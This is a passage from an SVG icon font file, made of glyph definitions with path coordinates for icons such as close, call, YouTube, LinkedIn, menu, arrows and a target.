c-41.3057 -41.3057 -96.2246 -64.0527 -154.638 -64.0527zM256 409.819c-58.1816 0 -112.881 -22.6572 -154.022 -63.7979c-41.1406 -41.1416 -63.7979 -95.8408 -63.7979 -154.022s22.6572 -112.881 63.7979 -154.021c41.1406 -41.1406 95.8408 -63.7979 154.022 -63.7979
s112.881 22.6572 154.021 63.7979c41.1406 41.1396 63.7979 95.8398 63.7979 154.021c0 58.1816 -22.6572 112.882 -63.7979 154.022c-41.1416 41.1416 -95.8398 63.7979 -154.021 63.7979zM161.043 97.0439c-7.28418 7.2832 -7.28418 19.0957 0 26.3799l68.5752 68.5752
l-68.5752 68.5762c-7.28516 7.28516 -7.28516 19.0957 0 26.3809c7.2832 7.28418 19.0957 7.28418 26.3799 0l68.5752 -68.5762l68.5762 68.5762c7.28516 7.28418 19.0967 7.28418 26.3799 0c7.28516 -7.28418 7.28516 -19.0957 0 -26.3809l-68.5752 -68.5762
l68.5771 -68.5752c7.28418 -7.28418 7.28418 -19.0967 0 -26.3799c-3.64355 -3.64258 -8.41699 -5.46484 -13.1904 -5.46484c-4.77441 0 -9.54883 1.82129 -13.1904 5.46484l-68.5762 68.5752l-68.5752 -68.5752c-3.6416 -3.64258 -8.41602 -5.46484 -13.1904 -5.46484
c-4.77344 0 -9.54688 1.82129 -13.1904 5.46484zM337.767 91.1436c-5.10059 0 -9.89355 1.98535 -13.499 5.59277l-68.2676 68.2676l-68.2666 -68.2676c-3.60547 -3.60742 -8.39941 -5.59277 -13.499 -5.59277c-5.09863 0 -9.89258 1.98535 -13.498 5.59277
c-3.60547 3.60547 -5.5918 8.39844 -5.5918 13.4971s1.98633 9.8916 5.5918 13.498l68.2676 68.2676l-68.2676 68.2676c-7.44336 7.44336 -7.44336 19.5537 0 26.9971c3.60547 3.60547 8.39844 5.5918 13.498 5.5918s9.89355 -1.98633 13.499 -5.5918l68.2676 -68.2676
l68.2676 68.2676c3.60645 3.60547 8.39941 5.5918 13.498 5.5918s9.8916 -1.98633 13.4971 -5.5918c3.60645 -3.60547 5.5918 -8.39941 5.5918 -13.498c0 -5.09961 -1.98535 -9.89355 -5.5918 -13.499l-68.2676 -68.2676l68.2695 -68.2676
c3.60645 -3.60645 5.5918 -8.39941 5.5918 -13.498s-1.98535 -9.8916 -5.5918 -13.4971c-3.6084 -3.60645 -8.40137 -5.59277 -13.499 -5.59277zM256 166.235l68.8828 -68.8838c3.44043 -3.44141 8.01562 -5.33789 12.8838 -5.33789
c4.86523 0 9.44043 1.89648 12.8828 5.33789c3.44043 3.44043 5.33691 8.01465 5.33691 12.8818c0 4.86621 -1.89648 9.44141 -5.33691 12.8828l-68.8848 68.8828l68.8828 68.8838c3.44043 3.44043 5.33594 8.01562 5.33594 12.8828
c0 4.86621 -1.89551 9.44141 -5.33594 12.8818s-8.01465 5.33594 -12.8809 5.33594c-4.86719 0 -9.44238 -1.89551 -12.8838 -5.33594l-68.8828 -68.8828l-68.8828 68.8828c-3.44141 3.44043 -8.0166 5.33594 -12.8838 5.33594
c-4.86621 0 -9.44043 -1.89551 -12.8818 -5.33594c-7.10254 -7.10352 -7.10254 -18.6611 0 -25.7646l68.8838 -68.8838l-68.8838 -68.8828c-3.44043 -3.44141 -5.33594 -8.0166 -5.33594 -12.8828c0 -4.86719 1.89551 -9.44141 5.33594 -12.8818
c3.44141 -3.44141 8.0166 -5.33789 12.8828 -5.33789c4.86719 0 9.44141 1.89648 12.8828 5.33789z" />
    <glyph glyph-name="010-call" unicode="&#xf109;" 
d="M470.917 111.931c22.6523 0 41.083 -18.4307 41.084 -41.083v-93.7637c0 -22.6533 -18.4307 -41.084 -41.084 -41.084c-259.666 0 -470.917 211.249 -470.917 470.916c0 22.6533 18.4307 41.084 41.084 41.084h94.0264c22.6533 0 41.084 -18.4307 41.083 -41.085
c0 -31.3604 4.91699 -62.124 14.5977 -91.4443c4.70898 -15 0.77832 -30.9863 -10.1807 -41.9307l-42.1797 -56.0693c35.1523 -66.2627 76.2773 -107.375 143.041 -143.014l57.5693 43.459c8.72266 8.95898 26.292 13.4307 40.584 8.55566
c29.167 -9.63867 59.9453 -14.541 91.292 -14.541z" />
    <glyph glyph-name="055-signs-1" unicode="&#xf131;" 
d="M483.969 231.996c15.4434 0 28.0312 -12.4873 28.0312 -27.9346v-24.1934c0 -15.4307 -12.5879 -27.8691 -28.0312 -27.8691h-187.966v-188.324c0 -15.4307 -12.5049 -27.6729 -27.9482 -27.6729h-24.0557c-15.4434 0 -27.9971 12.2383 -27.9971 27.6729v188.324h-188
c-15.4395 0 -28.002 12.4346 -28.002 27.8691v24.1934c0 15.4473 12.5664 27.9346 28.002 27.9346h187.995v187.646c0 15.4434 12.5586 28.3555 27.998 28.3555h24.0557c15.4434 0 27.9473 -12.9121 27.9473 -28.3555v-187.646h188h-0.0292969z" />
    <glyph glyph-name="006-icon-121954" unicode="&#xf105;" 
d="M437.02 373.02c48.3516 -48.3525 74.9805 -112.64 74.9805 -181.02c0 -33.3926 -10.1592 -61.7246 -29.3779 -81.9316c-17.5381 -18.4395 -41.1592 -28.5947 -66.5127 -28.5947s-48.9736 10.1543 -66.5117 28.5947c-6.80469 7.1543 -12.4482 15.3457 -16.9326 24.3994
c-17.5117 -23.2764 -45.3594 -38.3574 -76.665 -38.3574c-52.874 0 -95.8896 43.0166 -95.8896 95.8896s43.0156 95.8896 95.8896 95.8896s95.8896 -43.0156 95.8896 -95.8896c0 -54.1816 33.2891 -78.8574 64.2197 -78.8574s64.2207 24.6777 64.2207 78.8574
c0 123.696 -100.634 224.33 -224.33 224.33s-224.33 -100.634 -224.33 -224.33s100.634 -224.33 224.33 -224.33c30.291 0 59.6689 5.92871 87.3135 17.6221l12.3389 -29.168c-31.5713 -13.3525 -65.0996 -20.124 -99.6523 -20.124
c-68.3799 0 -132.667 26.6289 -181.02 74.9805c-48.3516 48.3525 -74.9805 112.64 -74.9805 181.02s26.6289 132.667 74.9805 181.02c48.3525 48.3516 112.64 74.9805 181.02 74.9805s132.667 -26.6289 181.02 -74.9805zM256 127.78
c35.4102 0 64.2197 28.8096 64.2197 64.2197s-28.8096 64.2197 -64.2197 64.2197s-64.2197 -28.8096 -64.2197 -64.2197s28.8096 -64.2197 64.2197 -64.2197z" />
    <glyph glyph-name="060-document" unicode="&#xf136;" 
d="M347.429 320h109.714v-329.143c0 -30.2969 -24.5596 -54.8574 -54.8564 -54.8574h-292.572c-30.2969 0 -54.8564 24.5605 -54.8564 54.8574v402.285c0 30.2969 24.5596 54.8574 54.8564 54.8574h219.429v-109.714c0 -10.0996 8.18652 -18.2861 18.2861 -18.2861z
M365.714 437.284l80.7139 -80.7119h-80.7139v80.7119z" />
    <glyph glyph-name="089-youtube" unicode="&#xf14e;" 
d="M470.569 399.927c10.293 -37.5957 9.89648 -115.959 9.89648 -115.959s0 -77.9648 -9.89062 -115.563c-5.54297 -20.5801 -21.7686 -36.8057 -42.3525 -42.3457c-37.5977 -9.89746 -187.988 -9.89746 -187.988 -9.89746s-150 0 -187.991 10.29
c-20.583 5.54297 -36.8066 21.7686 -42.3486 42.3496c-9.89453 37.2021 -9.89453 115.562 -9.89453 115.562s0 77.9678 9.89453 115.563c5.53613 20.5811 22.1611 37.2051 42.3457 42.7422c37.5986 9.89746 187.988 9.89746 187.988 9.89746s150.396 0 187.994 -10.2881
c20.5811 -5.54199 36.8096 -21.7676 42.3467 -42.3516zM192.346 212.334l125.062 72.0293l-125.062 72.0293v-144.059zM192.346 212.334z" />
    <glyph glyph-name="043-symbol" unicode="&#xf127;" 
d="M458.125 313.281c10.5674 5.14062 23.3701 0.713867 28.4893 -9.91113c16.8438 -34.7715 25.3857 -72.2559 25.3857 -111.37c0 -141.151 -114.849 -256 -256 -256s-256 114.849 -256 256s114.849 256 256 256c57.6514 0 114.114 -19.6357 158.984 -55.2969
c9.22949 -7.32812 10.7656 -20.7549 3.42676 -29.9736c-7.33789 -9.22461 -20.7812 -10.7607 -29.9736 -3.42188c-37.9014 30.1094 -83.6924 46.0254 -132.438 46.0254c-117.63 0 -213.333 -95.7031 -213.333 -213.333s95.7031 -213.333 213.333 -213.333
s213.333 95.7031 213.333 213.333c0 32.6299 -7.10352 63.8389 -21.1191 92.792c-5.13086 10.5986 -0.693359 23.3594 9.91113 28.4893zM458.125 313.281zM256 362.667c11.7764 0 21.333 -9.55762 21.333 -21.334v-128h85.334c11.7754 0 21.333 -9.55664 21.333 -21.333
s-9.55762 -21.333 -21.333 -21.333h-106.667c-11.7764 0 -21.333 9.55664 -21.333 21.333v149.333c0 11.7764 9.55664 21.334 21.333 21.334zM256 362.667z" />
    <glyph glyph-name="057-shapes-and-symbols" unicode="&#xf133;" 
d="M376 418c77.5322 0 136 -63.417 136 -147.514c0 -90.8545 -72.9434 -153.016 -183.357 -247.108c-18.7627 -15.9902 -40.0166 -34.1025 -62.1104 -53.4248c-2.91211 -2.54883 -6.65234 -3.95312 -10.5322 -3.95312s-7.62012 1.4043 -10.5322 3.9541
c-22.0918 19.3193 -43.3467 37.4326 -62.0986 53.4141c-110.426 94.1025 -183.369 156.264 -183.369 247.118c0 84.0967 58.4678 147.514 136 147.514c27.7832 0 53.2549 -8.80371 75.707 -26.168c21.5254 -16.6475 35.8564 -37.8486 44.293 -53.2676
c8.43652 15.418 22.7676 36.6201 44.293 53.2676c22.4521 17.3643 47.9238 26.168 75.707 26.168z" />
    <glyph glyph-name="003-menu" unicode="&#xf102;" 
d="M486.4 12.8008c14.1309 0 25.5996 -11.4688 25.5996 -25.5986c0 -14.1328 -11.4688 -25.6025 -25.5996 -25.6025h-460.801c-14.1309 0 -25.5996 11.4697 -25.5996 25.6016c0 14.1309 11.4688 25.5996 25.5996 25.5996h460.801zM25.5996 371.201
c-14.1309 0 -25.5996 11.4678 -25.5996 25.5986c0 14.1318 11.4688 25.6006 25.5996 25.6006h460.801c14.1309 0 25.5996 -11.4678 25.5996 -25.5996s-11.4688 -25.5996 -25.5996 -25.5996h-460.801zM486.4 217.601c14.1309 0 25.5996 -11.4697 25.5996 -25.6006
s-11.4688 -25.5996 -25.5996 -25.5996h-460.801c-14.1309 0 -25.5996 11.4678 -25.5996 25.5996s11.4688 25.6006 25.5996 25.6006h460.801z" />
    <glyph glyph-name="027-arrowsoutline" unicode="&#xf118;" 
d="M344.774 366.591l161.812 -161.827c7.21875 -6.95898 7.21875 -18.5684 0 -25.543l-161.812 -161.812c-6.95801 -7.21875 -18.584 -7.21875 -25.8027 0c-6.97559 6.95898 -6.97559 18.584 0 25.8037l130.837 130.593h-431.745
c-10.0645 0 -18.0635 8.25977 -18.0635 18.3242s7.99902 18.0645 18.0635 18.0801h431.745l-130.837 130.838c-6.97559 6.95898 -6.97559 18.5674 0 25.543c7.21875 7.21875 18.8281 7.21875 25.8027 0z" />
    <glyph glyph-name="084-linkedin" unicode="&#xf149;" 
d="M58.2666 448.502c35.2383 0 56.9209 -23.1357 57.5928 -53.543c0 -29.7363 -22.3545 -53.5312 -58.2754 -53.5312h-0.668945c-34.5664 0 -56.915 23.7949 -56.915 53.5312c0 30.4072 23.0352 53.543 58.2666 53.543zM58.2666 448.502zM6.08789 299.12h102.997v-309.871
h-102.997v309.871zM6.08789 299.12zM361.895 306.393c67.7598 0 118.574 -44.29 118.574 -139.469v-177.675h-102.988v165.771c0 41.6572 -14.9053 70.0732 -52.1758 70.0732c-28.4541 0 -45.3984 -19.1641 -52.8447 -37.6631
c-2.7207 -6.62402 -3.39258 -15.873 -3.39258 -25.1377v-173.044h-102.994v309.871h103v-44.9385s37.2578 52.2109 92.8213 52.2109zM361.895 306.393z" />
    <glyph glyph-name="080-arrow-pointing-to-left" unicode="&#xf145;" 
d="M488.193 215.808c13.1475 0 23.8066 -10.6602 23.8066 -23.8066c0 -13.1455 -10.6592 -23.8066 -23.8066 -23.8066h-406.91l111.722 -111.722c9.29785 -9.29785 9.29785 -24.3701 0 -33.668c-4.65039 -4.64551 -10.7412 -6.97266 -16.834 -6.97266
s-12.1895 2.32715 -16.834 6.97266l-152.362 152.362c-9.2998 9.29785 -9.2998 24.3701 0 33.668l152.358 152.362c9.2959 9.2959 24.3682 9.2959 33.668 0c9.29785 -9.29785 9.29785 -24.3701 0 -33.668l-111.718 -111.722h406.91z" />
    <glyph glyph-name="059-close" unicode="&#xf135;" 
d="M512 387.667l-195.666 -195.666l195.665 -195.668l-60.333 -60.333l-195.667 195.666l-195.666 -195.666l-60.333 60.333l195.666 195.668l-195.666 195.666l60.333 60.333l195.666 -195.666l195.668 195.666z" />
    <glyph glyph-name="054-files-1" unicode="&#xf130;" 
d="M416.479 122.592c51.5947 0 93.3311 -41.7373 93.3066 -93.3076c0 -51.5244 -41.7363 -93.2842 -93.3301 -93.2842c-51.4775 0 -93.2598 41.7598 -93.2598 93.2842c0 9.18164 1.79297 17.874 4.26367 26.2393l-157.671 80.6533
c-17.0576 -22.6279 -43.8564 -37.4482 -74.3613 -37.4482c-51.5459 0 -93.2598 41.7598 -93.2598 93.2832c0 51.5244 41.7129 93.3066 93.2598 93.3066c29.6885 0 55.8818 -14.168 72.9873 -35.8174l158.417 81.0264c-2.09668 7.76074 -3.58887 15.7764 -3.58887 24.2129
c0 51.5 41.7832 93.2598 93.2607 93.2598c51.5928 0 93.3301 -41.7598 93.3291 -93.2607c0 -51.5479 -41.7363 -93.2842 -93.3301 -93.2842c-30.458 0 -57.2803 14.7744 -74.2686 37.3789l-157.741 -80.6523c2.4707 -8.38965 4.24121 -17.0117 4.24121 -26.1699
c0 -8.41211 -1.49023 -16.4053 -3.56445 -24.1416l158.439 -81.0264c17.083 21.626 43.2285 35.748 72.8701 35.748z" />
    <glyph glyph-name="023-arrows-1" unicode="&#xf114;" 
d="M384 384c35.2881 0 64 -28.7119 64 -64v-256c0 -35.2881 -28.7119 -64 -64 -64h-256c-35.2881 0 -64 28.7119 -64 64v256c0 35.2881 28.7119 64 64 64h64c8.83203 0 16 -7.16797 16 -16s-7.16797 -16 -16 -16h-64c-17.6484 0 -32 -14.3516 -32 -32v-256
c0 -17.6484 14.3516 -32 32 -32h256c17.6484 0 32 14.3516 32 32v256c0 17.6484 -14.3516 32 -32 32h-64c-8.83203 0 -16 7.16797 -16 16s7.16797 16 16 16h64zM180.536 227.168c6.16016 6.32812 16.2959 6.46387 22.6318 0.288086l52.6885 -51.3125l52.9834 51.3125
c6.32812 6.17578 16.4639 6.03223 22.624 -0.295898c6.16797 -6.32812 6.03223 -16.4561 -0.295898 -22.624l-52.6875 -51.3125c-6.15234 -6.14355 -14.2725 -9.22363 -22.4248 -9.22363c-8.20801 0 -16.4238 3.12012 -22.6875 9.37598l-52.5361 51.168
c-6.32812 6.16016 -6.46387 16.2959 -0.295898 22.624z" />
    <glyph glyph-name="030-energy" unicode="&#xf11b;" 
d="M243.273 300.629c4.14062 0 7.5 -3.35938 7.5 -7.5v-74.7695c0 -4.14453 -3.35547 -7.5 -7.5 -7.5c-4.14062 0 -7.5 3.35547 -7.5 7.5v74.7695c0 4.14062 3.35938 7.5 7.5 7.5zM243.273 300.629zM152.441 64.8398c-3.57031 -2.0625 -8.16406 -0.859375 -10.2461 2.74609
c-2.07031 3.58594 -0.839844 8.17188 2.74609 10.2422l64.7539 37.3867c3.58203 2.07031 8.17188 0.839844 10.2422 -2.74609s0.84375 -8.17188 -2.74609 -10.2422zM152.441 64.8398zM383.484 98.5469c3.58594 -2.07031 4.8125 -6.65625 2.74219 -10.2422
c-1.38672 -2.40625 -3.91016 -3.75 -6.5 -3.75c-1.27344 0 -2.5625 0.324219 -3.74219 1.00391l-64.7539 37.3867c-3.58594 2.07031 -4.81641 6.65625 -2.74609 10.2422s6.65625 4.81641 10.2461 2.74609zM383.484 98.5469zM63.0742 116.469
c-3.64844 0 -6.84766 2.66406 -7.40625 6.37891c-1.49219 9.875 -2.25 19.9648 -2.25 30c0 77.4258 44.4453 145.945 111.484 178.875c3.71875 1.82422 8.21094 0.289062 10.0352 -3.42578c1.82812 -3.71875 0.292969 -8.21094 -3.42578 -10.0391
c-61.8789 -30.3984 -103.094 -93.6797 -103.094 -165.41c0 -9.28516 0.699219 -18.625 2.07812 -27.7578c0.621094 -4.09766 -2.19531 -7.91797 -6.29297 -8.53516c-0.378906 -0.0585938 -0.757812 -0.0859375 -1.12891 -0.0859375zM63.0742 116.469zM170.336 281.203
c3.48438 2.23828 8.125 1.23047 10.3633 -2.25781c2.23828 -3.48438 1.22656 -8.12109 -2.25781 -10.3594c-39.625 -25.4492 -63.2812 -68.7148 -63.2812 -115.738c0 -2.99609 0.109375 -6.14062 0.324219 -9.34375c0.277344 -4.12891 -2.85156 -7.70703 -6.98438 -7.98438
c-4.16797 -0.273438 -7.70703 2.88281 -7.98047 6.98438c-0.238281 3.53516 -0.355469 7.01172 -0.355469 10.3438c0 52.1523 26.2305 100.137 70.1719 128.355zM170.336 281.203zM320.199 324.211c-3.85156 1.52734 -5.73828 5.88281 -4.21484 9.73438
s5.88281 5.73828 9.73438 4.21484c9.28906 -3.67969 18.3906 -8.10156 27.0625 -13.1445c66.9258 -38.9375 103.797 -111.812 98.5469 -186.312c-0.277344 -3.95312 -3.57422 -6.97266 -7.47266 -6.97266c-0.179688 0 -0.355469 0.00390625 -0.535156 0.015625
c-4.13281 0.292969 -7.24609 3.87891 -6.95312 8.00781c4.84375 68.7734 -29.125 136.223 -91.1289 172.297c-8.02344 4.66797 -16.4492 8.76172 -25.0391 12.1602zM320.199 324.211zM313.492 276.066c-3.71094 1.83984 -5.23047 6.33984 -3.39062 10.0508
c1.83984 3.70703 6.33984 5.22656 10.0508 3.38672c3.16406 -1.56641 6.23438 -3.21484 9.11719 -4.89062c45.082 -26.2305 73.3633 -73.0352 75.6602 -125.207c0.179688 -4.13672 -3.02344 -7.64062 -7.16406 -7.82031
c-0.109375 -0.0078125 -0.222656 -0.0078125 -0.335938 -0.0078125c-3.98828 0 -7.30859 3.14453 -7.48438 7.16797c-2.07031 47.0469 -27.5703 89.2539 -68.2188 112.902c-2.59375 1.51172 -5.36719 2.99609 -8.23438 4.41797zM313.492 276.066zM371.164 11.8516
c3.17578 2.66406 7.90625 2.24609 10.5664 -0.925781c2.66016 -3.17578 2.24609 -7.90234 -0.925781 -10.5664c-7.65625 -6.41797 -15.875 -12.3203 -24.4375 -17.543c-65.2461 -39.8164 -146.883 -38.6289 -210.762 1.98438
c-3.49609 2.22266 -4.52734 6.85547 -2.30469 10.3516c2.21875 3.49609 6.85938 4.52734 10.3516 2.30469c57.9492 -36.8398 133.43 -39.3516 194.902 -1.83984c7.92188 4.83594 15.5312 10.2969 22.6094 16.2344zM371.164 11.8516zM332.016 22.7148
c-44.5586 -27.1914 -99.1875 -29.75 -146.121 -6.96094c-3.72656 1.80859 -5.28125 6.29688 -3.47266 10.0195c1.80859 3.72656 6.29688 5.28125 10.0234 3.47266c42.3672 -20.5703 91.6211 -18.2266 131.758 6.27344c2.57031 1.56641 5.19531 3.29297 7.80469 5.14062
c3.38672 2.38672 8.0625 1.58203 10.4531 -1.80078s1.58594 -8.0625 -1.79688 -10.4492c-2.88672 -2.03906 -5.79297 -3.95703 -8.64844 -5.69531zM332.016 22.7148zM506.246 29.2617c6.16406 -5.70312 7.53516 -14.7656 3.33984 -22.0391l-7.88672 -13.6562
c-3.30859 -5.73047 -9.26562 -8.94922 -15.4336 -8.94922c-2.83203 0 -5.70703 0.679688 -8.39062 2.10156l-218.094 115.535c-1.86328 -0.261719 -3.75781 -0.421875 -5.67969 -0.476562l-18.3594 -42.3867c-0.871094 -2.00781 -2.57422 -3.53516 -4.66016 -4.18359
l-127.219 -39.457c-3.95703 -1.22656 -8.16016 0.984375 -9.38672 4.94141s0.984375 8.15625 4.94141 9.38281l123.926 38.4375l15.2461 35.1953c-18.2891 5.22656 -32.4219 20.4023 -36.125 39.2812l-186.105 -116.688
c-1.30859 -0.824219 -1.73047 -2.51562 -0.957031 -3.85156l7.88281 -13.6562c0.671875 -1.16406 2.04297 -1.69922 3.32422 -1.30078l45.5586 14.1289c3.95703 1.22656 8.15625 -0.984375 9.38281 -4.94141c1.23047 -3.95312 -0.984375 -8.15625 -4.94141 -9.38281
l-45.5547 -14.1289c-1.77734 -0.550781 -3.57812 -0.816406 -5.35156 -0.816406c-6.23828 0 -12.1328 3.27734 -15.4062 8.94141l-7.88281 13.6562c-4.82812 8.35938 -2.20312 18.9297 5.98047 24.0586l193.676 121.438c1.59766 10.6875 6.52734 20.3008 13.6875 27.7578
l-26.3555 35.5117c-1.30078 1.75391 -1.77344 3.99219 -1.28906 6.125l46.2852 204.25c1.85156 8.1875 9.01562 13.9102 17.4141 13.9102h15.7656c9.65625 0 17.4961 -7.55859 17.8477 -17.207l1.71094 -46.8867c0.148438 -4.14062 -3.08594 -7.61719 -7.22266 -7.76562
c-4.11719 -0.140625 -7.61719 3.07812 -7.76953 7.21875l-1.70703 46.8867c-0.0585938 1.54297 -1.3125 2.75391 -2.85938 2.75391h-15.7656c-1.34375 0 -2.49219 -0.914062 -2.78906 -2.22656l-45.5234 -200.887l24.0938 -32.4648
c15.8477 8.96094 35.7188 8.68359 51.3555 -0.75l-5.88281 161.445c-0.148438 4.13672 3.08203 7.61719 7.22266 7.76562c4.13672 0.164062 7.61719 -3.08203 7.76562 -7.21875l6.4375 -176.586c2.94531 -4.20703 5.28125 -8.875 6.86328 -13.875l45.1953 5.21094
c2.17969 0.253906 4.34766 -0.457031 5.95312 -1.94531zM252.609 116.738c20.1328 0 36.1055 16.4336 36.1055 36.1094c0 19.9102 -16.2305 36.1055 -36.1055 36.1055c-19.8711 0 -36.1094 -16.1641 -36.1094 -36.1055c0 -19.6562 16.0977 -36.1094 36.1094 -36.1094z
M496.594 14.7227c0.675781 1.16406 0.453125 2.61328 -0.53125 3.52734l-151.215 139.871l-41.1367 -4.74609c0.203125 -18.1992 -9.43359 -35.0664 -24.7422 -44.3125l205.93 -109.09c1.37109 -0.726562 3.04297 -0.242188 3.8125 1.09375zM496.594 14.7227z" />
    <glyph glyph-name="038-aim" unicode="&#xf122;" 
d="M489.129 405.629c5.52344 0 10.001 -4.47656 10.001 -10c0 -5.52246 -4.47656 -10 -10 -10h-37.8613l-48.6201 -48.7529c-0.0126953 -0.0107422 -0.0214844 -0.0244141 -0.0332031 -0.0361328c-0.0136719 -0.0126953 -0.0283203 -0.0234375 -0.0410156 -0.0371094
l-42.2764 -42.3906c16.4043 -18.3994 28.3613 -40.3789 34.7969 -64.125c3.66797 -13.5303 5.52734 -27.5625 5.52734 -41.708c0 -87.7109 -71.3584 -159.069 -159.069 -159.069s-159.07 71.3584 -159.07 159.069s71.3574 159.069 159.068 159.069
c38.8105 0 75.5508 -13.8467 104.527 -39.1719l35.0986 35.1953c-38.3848 34.6318 -87.582 53.5898 -139.627 53.5898c-115.067 0 -208.683 -93.6143 -208.683 -208.683c0 -115.069 93.6152 -208.683 208.683 -208.683c115.068 0 208.684 93.6143 208.684 208.683
c0 31.7529 -6.94531 62.2383 -20.6416 90.6074c-2.40039 4.97461 -0.31543 10.9521 4.6582 13.3535c4.97168 2.40234 10.9521 0.316406 13.3525 -4.6582c15.0166 -31.1035 22.6309 -64.5137 22.6309 -99.3027c0 -61.083 -23.7871 -118.511 -66.9795 -161.703
c-6.56934 -6.56836 -13.4707 -12.6807 -20.6611 -18.3369l55.4668 -55.4668c3.90625 -3.90625 3.90527 -10.2383 0 -14.1436c-1.95117 -1.95215 -4.51172 -2.92871 -7.07031 -2.92871c-2.55957 0 -5.11816 0.976562 -7.07129 2.92871l-57.8008 57.8018
c-36.748 -23.9658 -79.665 -36.833 -124.566 -36.833c-44.6826 0 -87.4014 12.7422 -124.031 36.4844l-57.4512 -57.4531c-1.95215 -1.95215 -4.5127 -2.92871 -7.07129 -2.92871s-5.11816 0.976562 -7.07129 2.92871c-3.9043 3.90625 -3.9043 10.2383 0 14.1436
l55.0742 55.0742c-7.36816 5.7627 -14.4316 12.0107 -21.1514 18.7295c-43.1914 43.1924 -66.9785 100.62 -66.9785 161.703s23.7871 118.511 66.9785 161.703c43.1924 43.1914 100.62 66.9785 161.703 66.9785c57.375 0 111.587 -21.0332 153.76 -59.418l41.8066 41.9199
v38.2373c0 5.52344 4.47656 10 10 10c5.52246 0 10 -4.47656 10 -10v-32.3711h32.0107zM375.792 225.055c-5.52051 20.3721 -15.7031 39.2598 -29.6445 55.165l-41.2324 -41.3438c10.998 -13.8242 17.5918 -31.2998 17.5918 -50.2969
c0 -44.6377 -36.3145 -80.9531 -80.9531 -80.9531c-44.6377 0 -80.9531 36.3154 -80.9531 80.9531s36.3164 80.9531 80.9531 80.9531c18.4463 0 35.4619 -6.21484 49.0898 -16.6436l41.2852 41.3975c-25.1729 21.583 -56.8955 33.3623 -90.375 33.3623
c-76.6826 0 -139.068 -62.3877 -139.068 -139.069s62.3857 -139.069 139.068 -139.069c76.6836 0 139.069 62.3867 139.069 139.069c0 12.3789 -1.625 24.6514 -4.83105 36.4756zM235.828 183.764c-3.91113 3.90137 -3.91895 10.2324 -0.0195312 14.1436l40.5547 40.6641
c-9.87695 6.89844 -21.875 10.9609 -34.8105 10.9609c-33.6094 0 -60.9531 -27.3438 -60.9531 -60.9531s27.3438 -60.9531 60.9531 -60.9531c33.6104 0 60.9531 27.3438 60.9531 60.9531c0 13.4688 -4.39844 25.9248 -11.8252 36.0244l-40.71 -40.8203
c-1.9541 -1.95898 -4.51758 -2.93848 -7.08105 -2.93848c-2.55469 0 -5.10938 0.973633 -7.06152 2.91895zM409.22 314.36c0 5.52246 4.47754 10 10 10c5.52344 0 10 -4.47754 10 -10c0 -5.52344 -4.47656 -10 -10 -10c-5.52246 0 -10 4.47656 -10 10z" />
    <glyph glyph-name="016-effort" unicode="&#xf10f;" 
d="M221.61 269.268c-8.84961 4.07617 -15.583 11.3516 -18.959 20.4912c-3.37598 9.14062 -2.99121 19.0469 1.08496 27.8965c4.0752 8.84961 11.3535 15.582 20.4932 18.958c9.13965 3.375 19.0469 2.98926 27.8955 -1.08496
c18.2686 -8.41211 26.2861 -30.1201 17.873 -48.3887c-6.14355 -13.3398 -19.3779 -21.2158 -33.1855 -21.2158c-5.09961 0 -10.2754 1.07422 -15.2021 3.34375zM217.362 311.382c-2.39941 -5.20996 -2.62695 -11.043 -0.639648 -16.4238
c1.9873 -5.37988 5.95117 -9.66504 11.1611 -12.0645c10.7549 -4.95508 23.5361 -0.233398 28.4893 10.5225c4.95312 10.7568 0.233398 23.5361 -10.5225 28.4893c-2.8623 1.31738 -5.91211 1.98047 -8.9707 1.98047c-2.51172 0 -5.02734 -0.445312 -7.45312 -1.3418
c-5.37988 -1.98828 -9.66504 -5.95215 -12.0645 -11.1621zM164.054 105.365l-17.1807 -26.5498c-2.27051 -3.50879 -6.0332 -5.45801 -9.94629 -5.45801c-1.68457 0 -3.39453 0.360352 -5.02734 1.1123c-5.42969 2.5 -8.13477 8.47363 -6.43262 14.2031v0l9.00977 30.3193
l-25.6084 11.792c-2.87695 1.3252 -4.6123 4.31641 -4.33301 7.47266c5.16211 58.3945 21.9512 137.181 40.8262 191.594c1.35742 3.91309 5.62891 5.98633 9.54492 4.62793c3.91406 -1.3584 5.98438 -5.63086 4.62793 -9.54395
c-17.96 -51.7705 -33.9932 -126.037 -39.5664 -182.747l18.8252 -8.66797l9.4834 31.915c0.102539 0.341797 0.228516 0.676758 0.376953 1.00098c2.59863 5.64062 7.2373 9.93164 13.0635 12.084c5.82422 2.15234 12.1396 1.90723 17.7822 -0.691406
c5.64062 -2.59766 9.93164 -7.23633 12.084 -13.0625c2.15234 -5.8252 1.90723 -12.1406 -0.691406 -17.7822c-0.149414 -0.324219 -0.321289 -0.637695 -0.515625 -0.936523l-18.0898 -27.957l23.6504 -10.8906c3.76172 -1.7334 5.40723 -6.1875 3.6748 -9.9502
c-1.26367 -2.74609 -3.98047 -4.36523 -6.81738 -4.36523c-1.04883 0 -2.11621 0.220703 -3.13184 0.689453zM162.479 160.565l-16.4951 -55.5137l31.4619 48.6211c0.751953 1.89258 0.77832 3.96875 0.0673828 5.89453
c-0.763672 2.06641 -2.28613 3.71289 -4.28809 4.63477s-4.24316 1.00977 -6.31055 0.246094c-1.92578 -0.711914 -3.48633 -2.08105 -4.43555 -3.88281zM459.683 347.077c1.77246 -1.99316 2.35254 -4.77734 1.52344 -7.30957l-8.75 -26.791
c-4.1084 -12.5859 -13.8135 -22.5879 -26.0312 -27.2549c-0.124023 -4.37402 -0.865234 -8.70801 -2.24902 -12.9463c-0.000976562 -0.00195312 -0.000976562 -0.00292969 -0.00195312 -0.00390625l-6.47852 -19.8105
c-6.18066 -18.9346 -23.7188 -31.6592 -43.6406 -31.6592c-4.85742 0 -9.66211 0.769531 -14.2783 2.28418c-20.5381 6.70996 -33.1387 26.6221 -31.501 47.2773c-6.84766 -13.4346 -15.9541 -28.8965 -26.916 -45.7002c13.5703 10.0908 32.6953 10.6377 46.9668 0.0791016
c9.99414 -7.40527 15.959 -19.252 15.959 -31.6904c0 -8.4707 -2.67578 -16.5684 -7.73926 -23.418l-45.9453 -62.0596l45.4707 -27.4893c10.7207 -6.48145 15.75 -19.4014 12.2295 -31.4189l-30.2725 -107.691c-0.541992 -1.92871 -1.83301 -3.55957 -3.58496 -4.53027
c-1.12207 -0.62207 -2.375 -0.94043 -3.63477 -0.94043c-0.707031 0 -1.41699 0.0996094 -2.10742 0.301758l-38.6631 11.3193c-3.93945 1.15332 -6.2207 5.26074 -5.11621 9.21484l20.6396 73.9365l-69.1201 42.6826c-6.28223 3.88086 -10.9775 9.35742 -13.873 15.5889
